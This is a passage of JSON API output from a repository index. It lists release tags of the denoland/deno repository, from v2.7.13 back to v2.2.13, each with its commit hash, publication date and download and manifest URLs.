github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.eco